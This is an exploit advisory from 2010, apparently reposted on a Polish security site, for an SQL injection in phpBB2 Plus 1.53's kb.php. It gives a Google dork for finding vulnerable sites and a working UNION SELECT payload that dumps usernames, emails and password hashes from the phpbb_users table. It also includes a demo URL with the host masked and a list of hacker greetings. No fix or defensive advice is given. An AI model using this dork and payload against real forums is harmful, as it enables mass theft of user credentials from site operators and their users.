Bezpieczeństwo informacji

  Historia :
[2010-03-19] Publikacja

  Podatne oprogramowanie :  

phpBB2 Plus 1.53 SQL

  Tekst :  

phpBB2 Plus 1.53 (kb.php?mode) SQL Injection Vulnerability

###########################

Author : Gamoscu

Homepage : http://www.1923turk.com

Blog : http://gamoscu.wordpress.com/

Dork : inurl:kb.php?mode=cat&cat=
###########################

[ Vulnerable File ]

kb.php?mode=cat&cat= [ SQL ]


[ XpL ]

-1+union+select+1,concat(user_id,char(58),username,
char(58),user_email,char(58),user_icq,char(58),use
r_password),3,4,5,6+from+phpbb_users+limit+1,2--


[ Demo]

http://www.xxxxx/xxxxxx/kb.php?mode=cat&cat=-1+union+select+1,concat(user_i
d,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_pas
sword),3,4,5,6,7+from+phpbb_users+limit+1,2--




################################################## ############
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci -
X-TRO
################################################## ############

  Referencje :  

None